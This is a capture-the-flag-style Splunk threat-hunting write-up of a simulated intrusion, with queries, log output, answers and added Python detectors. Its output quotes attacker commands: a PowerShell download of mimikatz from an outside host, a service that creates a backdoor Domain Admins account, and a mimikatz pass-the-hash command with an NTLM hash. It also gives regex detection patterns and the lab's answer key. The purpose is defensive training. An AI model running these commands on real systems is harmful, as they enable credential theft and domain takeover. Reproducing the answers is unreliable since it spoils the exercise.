
Phase 2 Splunk

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

Output:

ecthp
history
main
summary

index=* | stats values(source)

Output:

WinEventLog:Application
WinEventLog:Microsoft-Windows-PowerShell/Operational
WinEventLog:Microsoft-Windows-Sysmon/Operational
WinEventLog:Microsoft-Windows-TaskScheduler/Operational
WinEventLog:Microsoft-Windows-WMI-Activity/Operational
WinEventLog:Microsoft-Windows-WinRM/Operational
WinEventLog:Security
WinEventLog:System
WinEventLog:Windows PowerShell

index=*
| stats count by host

Output:

CLIENT  67466
PROD    1889
SECLOGS 1419

Listing all user accounts seen in the Security log:

index=ecthp source="WinEventLog:Security" 
| stats values(Account_Name) as Users

Output:

-
ANONYMOUS LOGON
Administrator
Administrator@RESEARCH.SECURITY.LOCAL
CLIENT$
CLIENT$@RESEARCH.SECURITY.LOCAL
CN=iwonthegame,CN=Users,DC=research,DC=SECURITY,DC=local
DWM-3
LOCAL SERVICE
PROD$
SECLOGS$
SECLOGS$@RESEARCH.SECURITY.LOCAL
SYSTEM
admin
administrator
administrator@research.security.local
bob
deskadmin
iwonthegame
john
nick
officedesk
officedesk@RESEARCH.SECURITY.LOCAL
sysadmin
sysuser

Filter all users that were assigned special privileges (EventCode 4672):

index=ecthp source="WinEventLog:Security" EventCode=4672
| table _time, Account_Name, Privileges, host
| sort _time 
| dedup Account_Name, Privileges, host

Output:

2025-05-15 08:36:39 PROD$   SeSecurityPrivilege PROD
2025-05-15 08:43:04 sysuser SeSecurityPrivilege CLIENT
2025-05-15 08:48:00 PROD$   SeAuditPrivilege    PROD
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege   CLIENT
2025-05-15 08:49:06 SYSTEM  SeAssignPrimaryTokenPrivilege   CLIENT
2025-05-15 08:53:36 officedesk  SeSecurityPrivilege SECLOGS
2025-05-15 08:57:04 john    SeSecurityPrivilege CLIENT
2025-05-15 08:58:09 Administrator   SeSecurityPrivilege PROD
2025-05-15 08:59:54 administrator   SeSecurityPrivilege PROD
2025-05-15 09:00:46 SYSTEM  SeAssignPrimaryTokenPrivilege   PROD

First user to receive special privileges on CLIENT:

index=ecthp source="WinEventLog:Security" EventCode=4672 host=CLIENT
| sort _time
| table _time, Account_Name, Privileges
| head 20

Output:

2025-05-15 08:43:04 sysuser SeSecurityPrivilege
2025-05-15 08:43:22 sysuser SeSecurityPrivilege
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege
2025-05-15 08:48:22 DWM-3   SeAssignPrimaryTokenPrivilege
2025-05-15 08:49:06 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:31 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:33 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:50:36 SYSTEM  SeAssignPrimaryTokenPrivilege
2025-05-15 08:57:04 john    SeSecurityPrivilege
2025-05-15 08:57:12 john    SeSecurityPrivilege
2025-05-15 09:02:06 SYSTEM  SeAssignPrimaryTokenPrivilege

Q1

According to the threat report, what two activities are associated with Silent Banshee's use of SMB?

Answer:

Gaining access to remote systems
Spreading malware and other tools to other systems

Q2

Based on the Silent Banshee threat report, for what purpose would the attackers use a tool with the SHA256 hash of 92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50?

Answer:

Gathering credentials from Windows systems

Q3

On the system that was initially compromised, the attackers were able to successfully download a malicious tool to use to gather more information about the network. What is the full folder name (ex: c:\folder\subfolder) of where they saved this file as it was downloaded?

Query:

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
| search TargetFilename="*.exe" OR TargetFilename="*.ps1"
| table _time, host, TargetFilename, Image

Output:


2025-05-15 08:46:37 CLIENT  C:\Windows\Temp\dyaql0fe.ch5.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:45:00 CLIENT  C:\Users\Public\Update.exe  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:45:00 CLIENT  C:\Windows\Temp\1o55y2qy.sgv.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:44:27 CLIENT  C:\Windows\Temp\wahee5d1.0eb.ps1    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:43:26 CLIENT  C:\Windows\Temp\5wqrqtvz.ouw.ps1    C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:43:25 CLIENT  C:\Windows\Temp\aoyfx0qq.huf.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:52:25 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:51:36 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:49:54 CLIENT  C:\Users\officedesk\AppData\Local\Temp\3\zzwmcin0.run.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:03:27 CLIENT  C:\Users\Administrator\AppData\Local\Temp\2\gos5h2n4.4ar.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:03:26 CLIENT  C:\Users\Administrator\AppData\Local\Temp\2\obmasdlk.5bx.ps1    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 09:00:46 PROD    C:\Users\Administrator\AppData\Local\Temp\zjq0dzgj.5mj.ps1  C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:57:07 CLIENT  C:\Users\john\AppData\Local\Temp\dldlopv0.e5l.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:56:29 CLIENT  C:\Users\Public\test.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:56:27 CLIENT  C:\Users\officedesk\AppData\Local\Temp\3\pkoweplj.3qv.ps1   C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:55:20 SECLOGS C:\Users\Public\abce.exe    C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:53:47 SECLOGS C:\Users\officedesk\AppData\Local\Temp\3u1wmzhw.5k4.ps1 C:\Windows\system32\wsmprovhost.exe

Answer:

C:\Users\Public

To confirm, list only the .exe files in creation order:

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11
| search TargetFilename="*.exe"
| sort _time
| table _time, host, TargetFilename, Image
| head 20

Output:

2025-05-15 08:45:00 CLIENT  C:\Users\Public\Update.exe  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:51:36 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:52:25 CLIENT  C:\Users\Public\view.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:55:20 SECLOGS C:\Users\Public\abce.exe    C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:56:29 CLIENT  C:\Users\Public\test.exe    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Q4

What user account was the attacker able to compromise to begin their attack?

index=ecthp host=CLIENT sysuser earliest="05/15/2025:08:42:00" latest="05/15/2025:08:45:00"
| sort _time
| table _time, EventCode, Account_Name, source 
| dedup EventCode, Account_Name, source

Output:

2025-05-15 08:42:47 4625    -, sysuser  WinEventLog:Security
2025-05-15 08:43:04 4634    sysuser     WinEventLog:Security
2025-05-15 08:43:04 5140    sysuser     WinEventLog:Security
2025-05-15 08:43:04 4624    -, sysuser  WinEventLog:Security
2025-05-15 08:43:04 4672    sysuser     WinEventLog:Security
2025-05-15 08:43:23 4674    sysuser     WinEventLog:Security

  • 08:42:47 - EventCode 4625 (Failed Login) for sysuser
  • 08:43:04 - EventCode 4624 (Successful Login) for sysuser
  • 08:43:04 - EventCode 4672 (Special Privileges Assigned) for sysuser
  • 08:43:25 - First malicious PowerShell script created

Or check all failed login attempts before the successful one:

index=ecthp host=CLIENT EventCode=4625 earliest="05/15/2025:08:00:00" latest="05/15/2025:08:45:00"
| stats count by Account_Name
| sort -count

Output:

sysuser 1016
admin   1009
administrator   1009
bob 1009
deskadmin   1009
nick    1009
sysadmin    1009
Administrator   13

Answer:

sysuser
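The counts above show the classic spray shape: every account fails almost exactly the same number of times, and then a single one of them logs on. The Python script below is an added example, not part of the original write-up or of the lab's material. It builds a constructed Security-log sample that reproduces the page's counts (the source address 10.0.0.99 is an assumption, not from the page), counts 4625 failures per account the way `stats count by Account_Name` does, flags a spray when many accounts cross a failure threshold, and then reports which sprayed account later produced a 4624.

```python
from collections import Counter
from datetime import datetime, timedelta

# Constructed Security-log sample modelled on the page's Q4 counts: about a
# thousand 4625 failures per account across seven accounts within minutes,
# a trickle of unrelated Administrator failures, then a single 4624 for
# sysuser at 08:43:04. Source addresses are made-up placeholders.
SPRAY_SOURCE = "10.0.0.99"   # assumed, not taken from the page


def build_sample_events():
    events = []
    start = datetime(2025, 5, 15, 8, 30, 0)
    sprayed_accounts = ["sysuser", "admin", "administrator", "bob",
                        "deskadmin", "nick", "sysadmin"]
    t = start
    # One password tried against every account, round after round.
    for _ in range(1009):
        for acct in sprayed_accounts:
            events.append({"time": t, "code": 4625, "account": acct, "src": SPRAY_SOURCE})
            t += timedelta(milliseconds=100)
    # A few unrelated Administrator failures from elsewhere (background noise).
    for i in range(13):
        events.append({"time": start + timedelta(minutes=i), "code": 4625,
                       "account": "Administrator", "src": "10.0.0.50"})
    # Final guesses against sysuser, then the successful logon.
    for i in range(7):
        events.append({"time": datetime(2025, 5, 15, 8, 42, 40) + timedelta(seconds=i),
                       "code": 4625, "account": "sysuser", "src": SPRAY_SOURCE})
    events.append({"time": datetime(2025, 5, 15, 8, 43, 4), "code": 4624,
                   "account": "sysuser", "src": SPRAY_SOURCE})
    return sorted(events, key=lambda e: e["time"])


WINDOW_START = datetime(2025, 5, 15, 8, 0, 0)
WINDOW_END = datetime(2025, 5, 15, 8, 45, 0)


def failed_logons_by_account(events, start, end):
    """Equivalent of `EventCode=4625 | stats count by Account_Name` for a window."""
    counts = Counter()
    for e in events:
        if e["code"] == 4625 and start <= e["time"] <= end:
            counts[e["account"]] += 1
    return counts


def detect_spray(events, start, end, min_failures=20, min_accounts=5):
    """A spray is many accounts each failing many times: return those accounts,
    or an empty list if too few accounts cross the threshold."""
    counts = failed_logons_by_account(events, start, end)
    hot = sorted(a for a, n in counts.items() if n >= min_failures)
    return hot if len(hot) >= min_accounts else []


def compromised_after_spray(events, sprayed):
    """Sprayed accounts that log on successfully (4624) after their failures:
    returns account -> time of the first such success."""
    seen_failure = set()
    first_success = {}
    for e in events:                      # already sorted by time
        acct = e["account"]
        if acct not in sprayed:
            continue
        if e["code"] == 4625:
            seen_failure.add(acct)
        elif e["code"] == 4624 and acct in seen_failure and acct not in first_success:
            first_success[acct] = e["time"]
    return first_success


def run_hunt():
    """Run the whole chain and report plain strings, as the Splunk table would."""
    events = build_sample_events()
    counts = failed_logons_by_account(events, WINDOW_START, WINDOW_END)
    sprayed = detect_spray(events, WINDOW_START, WINDOW_END)
    hits = compromised_after_spray(events, set(sprayed))
    return {
        "failures": dict(counts),
        "sprayed": sprayed,
        "compromised": {a: t.strftime("%Y-%m-%d %H:%M:%S") for a, t in hits.items()},
    }


if __name__ == "__main__":
    result = run_hunt()
    for acct, n in sorted(result["failures"].items(), key=lambda kv: -kv[1]):
        print(f"{acct:<16}{n}")
    print("sprayed accounts:", ", ".join(result["sprayed"]))
    print("compromised:", result["compromised"])
```

The thresholds are deliberately two-dimensional: a single account with hundreds of failures is a lockout or a broken service, but five or more accounts each above the threshold in the same window is a spray, and the one that then succeeds is the account to contain first.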

Q5

What is the earliest time as shown in Splunk (ex: 2:43:05.000 AM) that the attacker was able to download a suspicious PowerShell script?

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*.ps1" host=CLIENT
| sort _time
| head 1
| table _time, TargetFilename

Answer:

8:43:25.000 AM
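Q3 and Q5 both come down to the same triage of Sysmon EventCode 11 rows: keep executables and scripts that land in world-writable staging directories, then ask which folder received them and which one came first. The Python script below is an added example, not part of the original write-up or of the lab's material. It re-types a handful of the page's rows as a constructed sample (plus one made-up benign row for contrast), parses them, applies the staging-directory filter, and answers both questions from the filtered set; the directory list and the extension list are assumptions chosen for this example.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample in the shape of the page's Sysmon EventCode 11 table
# (_time, host, TargetFilename, Image). The malicious rows copy values shown
# on the page; the last row is a made-up benign write for contrast.
SAMPLE_FILE_EVENTS = r"""
2025-05-15 08:46:37 CLIENT  C:\Windows\Temp\dyaql0fe.ch5.ps1 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:45:00 CLIENT  C:\Users\Public\Update.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:43:25 CLIENT  C:\Windows\Temp\aoyfx0qq.huf.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:51:36 CLIENT  C:\Users\Public\view.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:55:20 SECLOGS C:\Users\Public\abce.exe C:\Windows\system32\wsmprovhost.exe
2025-05-15 08:56:29 CLIENT  C:\Users\Public\test.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:49:54 CLIENT  C:\Users\officedesk\AppData\Local\Temp\3\zzwmcin0.run.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-05-15 08:40:00 CLIENT  C:\ProgramData\Vendor\agent.log C:\ProgramData\Vendor\agent.exe
"""

# One row: timestamp, host, target path, creating image (paths without spaces).
ROW_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(\S+)\s+(\S+)\s+(\S+)$")

# Assumed list of world-writable / throwaway locations that installers rarely
# use for executables or scripts (matched case-insensitively as substrings).
STAGING_DIRS = (r"c:\users\public", r"c:\windows\temp", r"\appdata\local\temp")
PAYLOAD_EXTENSIONS = (".exe", ".ps1", ".dll", ".bat", ".vbs")


def parse_events(text):
    """Turn the table text into dicts; skip lines that do not match the layout."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ts, host, target, image = m.groups()
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "host": host, "target": target, "image": image})
    return events


def is_suspicious_drop(event):
    """Executable or script content landing in a staging directory."""
    path = event["target"].lower()
    return path.endswith(PAYLOAD_EXTENSIONS) and any(d in path for d in STAGING_DIRS)


def suspicious_drops(text, host=None):
    """All suspicious FileCreate events, oldest first, optionally for one host."""
    hits = [e for e in parse_events(text) if is_suspicious_drop(e)]
    if host is not None:
        hits = [e for e in hits if e["host"] == host]
    return sorted(hits, key=lambda e: e["time"])


def earliest_drop(text, host, extension):
    """First suspicious file of a given type on a host (the Q5 question)."""
    for e in suspicious_drops(text, host):
        if e["target"].lower().endswith(extension):
            return e
    return None


def drop_folders(text, extension=".exe"):
    """Count which folders received payloads of a given type (the Q3 question)."""
    return Counter(e["target"].rsplit("\\", 1)[0]
                   for e in suspicious_drops(text)
                   if e["target"].lower().endswith(extension))


if __name__ == "__main__":
    for e in suspicious_drops(SAMPLE_FILE_EVENTS):
        print(e["time"], e["host"], e["target"], "<-", e["image"])
    first = earliest_drop(SAMPLE_FILE_EVENTS, "CLIENT", ".ps1")
    print("earliest script on CLIENT:", first["time"].strftime("%H:%M:%S"), first["target"])
    print("exe drop folders:", dict(drop_folders(SAMPLE_FILE_EVENTS)))
```

Filtering on the directory rather than only on the extension is what keeps the result small: the same query without the staging-directory condition would also return every legitimate installer and every script a user saved under their profile.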

Q6

What is the name of the object (ex: scheduled task, service, command, etc) the attacker creates on the PROD workstations to maintain their elevated access in the domain?

index=ecthp host=PROD (EventCode=7045 OR EventCode=4697)
| table _time, Service_Name, Service_File_Name, Account_Name
| sort _time

Output:

2025-05-15 09:00:38 Windows Performance C:\Windows\System32\cmd.exe /c net user iwonthegame Password123! /add /domain && net group "Domain Admins" iwonthegame /add /domain

Answer:

Windows Performance

Q7

What is the filename of the process that was launched to initiate a pass-the-hash attack? (filename only)

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| search CommandLine="*::*" OR CommandLine="*-hashes*" OR CommandLine="*NTLM*" OR Image="*mimikatz*" OR Image="*psexec*" OR Image="*wmiexec*" OR Image="*smbexec*"
| table _time, host, Image, CommandLine, User
| sort _time

Output:

C:\Users\Public\test.exe    "C:\Users\Public\test.exe" "sekurlsa::pth /user:administrator /domain:research.security.local /ntlm:84398159ce4d01cfe10cf34d5dae3909 /run:cmd.exe" exit

Answer:

test.exe
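The Q6 service-install row and the Q7 process-creation row are caught by the same kind of check: a small set of narrow indicators run over the command line, whether it comes from the service's binary path (EventCode 7045) or from Sysmon's CommandLine (EventCode 1). The Python script below is an added example, not part of the original write-up or of the lab's material. It re-types the two malicious rows from the page as a constructed sample, with the NTLM hash and the password replaced by placeholders, adds two made-up benign rows, and tags each event with the indicators that fire; the indicator names and regexes are this example's own choices.

```python
import re
from ntpath import basename

# Constructed sample rows: one service install (System log EventCode 7045),
# one process creation (Sysmon EventCode 1), and two benign rows for contrast.
# The two malicious command lines copy the page's output, except that the NTLM
# hash and the password are replaced with placeholders.
SAMPLE_EVENTS = [
    {"host": "PROD", "code": 7045, "name": "Windows Performance",
     "cmd": r'C:\Windows\System32\cmd.exe /c net user iwonthegame <password-redacted> /add /domain && net group "Domain Admins" iwonthegame /add /domain'},
    {"host": "CLIENT", "code": 1, "name": r"C:\Users\Public\test.exe",
     "cmd": r'"C:\Users\Public\test.exe" "sekurlsa::pth /user:administrator /domain:research.security.local /ntlm:00000000000000000000000000000000 /run:cmd.exe" exit'},
    {"host": "CLIENT", "code": 7045, "name": "Vendor Agent",
     "cmd": r"C:\ProgramData\Vendor\agent.exe --service"},
    {"host": "CLIENT", "code": 1, "name": r"C:\Windows\System32\net.exe",
     "cmd": "net user john /domain"},
]

# Each indicator: a tag and a regex over the command line. Patterns are kept
# narrow (the /add switch, the Domain Admins group, the pth module, a 32-hex
# NTLM value) so benign `net user` queries and normal services do not fire.
INDICATORS = [
    ("credential-theft: pass-the-hash",
     re.compile(r"sekurlsa::pth|/ntlm:[0-9a-f]{32}", re.I)),
    ("persistence: domain account created",
     re.compile(r"\bnet(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("privilege-escalation: Domain Admins membership",
     re.compile(r"\bnet(?:\.exe)?\s+group\s+\"?domain admins\"?\s+\S+\s+/add\b", re.I)),
    ("execution: binary in user-writable staging path",
     re.compile(r"c:\\users\\public\\|c:\\windows\\temp\\", re.I)),
]


def tag_event(event):
    """Return the indicator tags whose pattern matches this event's command line."""
    return [tag for tag, pattern in INDICATORS if pattern.search(event["cmd"])]


def display_name(event):
    """Service name for 7045; file name only (no path) for process creation."""
    return event["name"] if event["code"] == 7045 else basename(event["name"])


def triage(events):
    """Events carrying at least one indicator, with the tags that fired."""
    hits = []
    for e in events:
        tags = tag_event(e)
        if tags:
            hits.append({"host": e["host"], "code": e["code"],
                         "name": display_name(e), "tags": tags})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(f'{h["host"]:<8}{h["code"]:<6}{h["name"]:<20}{", ".join(h["tags"])}')
```

Running the same indicator set over both event sources matters because the service path is where a persistence mechanism hides its command line; a detection that only looks at Sysmon process creation would see the `cmd.exe` child but not the service name that answers Q6.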

Q8

What is the URL the attacker uploads exfiltrated data to? (Format your answer as http://IP:PORT/path)

index=ecthp source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| search CommandLine="*10.0.0.11*" OR CommandLine="*UploadString*" OR CommandLine="*WebClient*"
| table _time, CommandLine

Output:

2025-05-15 08:44:59 powershell  -Command "iwr -UseBasicParsing -Uri http://10.0.0.11/mimikatz.exe -OutFile C:\Users\Public\Update.exe"
2025-05-15 08:44:27 powershell  -Command "iwr -UseBasicParsing -Uri http://10.0.0.11/mimikatz.exe -OutFile C:\Users\Public\Update.exe"

index=ecthp EventCode=3 DestinationIp="10.0.0.11" DestinationPort=80
| table _time, Image, CommandLine, DestinationIp, DestinationPort

Output:

2025-05-15 08:50:04 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:51:38 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:52:26 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80
2025-05-15 08:56:31 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe       10.0.0.11   80

index=ecthp "10.0.0.11" (upload OR POST OR PUT)
| table _time, host, source, CommandLine, _raw
| sort _time

The attacker uploaded the exfiltrated data to the following URL.

Answer:

http://10.0.0.11:8000/upload

Q9

What is the FQDN (ex: workstation.network.local) of the machine that the attackers initially compromised?

Answer:

client.research.SECURITY.local
